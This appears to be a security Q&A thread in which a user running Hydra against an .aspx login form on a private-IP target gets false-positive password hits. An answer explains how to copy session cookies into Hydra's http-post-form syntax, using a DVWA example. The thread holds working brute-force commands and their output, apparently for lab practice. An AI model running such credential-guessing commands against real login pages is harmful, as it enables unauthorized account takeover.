4

I've been playing around with Hydra and .aspx site and I've hit a bit of a snag - Hydra responds letting me know that the first 16 passwords in my password list are correct when none of them are.

Syntax :

hydra 192.168.88.196 -l admin -P /root/lower http-post-form "/mmm/index.aspx:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."

Output

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-05-05 22:30:51

[DATA] 16 tasks, 1 server, 815 login tries (l:1/p:815), ~50 tries per task

[DATA] attacking service http-get-form on port 80

[80][www-form] host: 192.168.88.196   login: admin   password: adrianna

[STATUS] attack finished for 192.168.88.196 (waiting for children to finish)

[80][www-form] host: 192.168.88.196   login: admin   password: adrian

[80][www-form] host: 192.168.88.196   login: admin   password: aerobics

[80][www-form] host: 192.168.88.196   login: admin   password: academic

[80][www-form] host: 192.168.88.196   login: admin   password: access

[80][www-form] host: 192.168.88.196   login: admin   password: abc

[80][www-form] host: 192.168.88.196   login: admin   password: admin

[80][www-form] host: 192.168.88.196   login: admin   password: academia

[80][www-form] host: 192.168.88.196   login: admin   password: albatross

[80][www-form] host: 192.168.88.196   login: admin   password: alex

[80][www-form] host: 192.168.88.196   login: admin   password: airplane

[80][www-form] host: 192.168.88.196   login: admin   password: albany

[80][www-form] host: 192.168.88.196   login: admin   password: ada

[80][www-form] host: 192.168.88.196   login: admin   password: aaa

[80][www-form] host: 192.168.88.196   login: admin   password: albert

[80][www-form] host: 192.168.88.196   login: admin   password: alexander

1 of 1 target successfuly completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-05-05 22:30:51

I have read that we can add cookies to hydra okay: "H=Cookie: security;low;PHPSESSID=<value for PHP SESSID cookie"

  1. How do you get cookies from aspx?
  2. How do you provide it to hydra?
schroeder
  • 123,438
  • 55
  • 284
  • 319
user3306821
  • 43
  • 1
  • 1
  • 5

1 Answers1

4

Use a browser plugin such as Cookies Manager Plus on Firefox, then you can simply copy the value to the clipboard.

As you say, simply paste the value into the command line for Hydra.

See my answer here for the syntax that worked for me.

"/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=07b7ebb2faea96f8471ecdb759e68108; security=low"

So instead of PHPSESSID and the value you include the name of the ASP.NET session ID and value.

SilverlightFox
  • 33,408
  • 6
  • 67
  • 178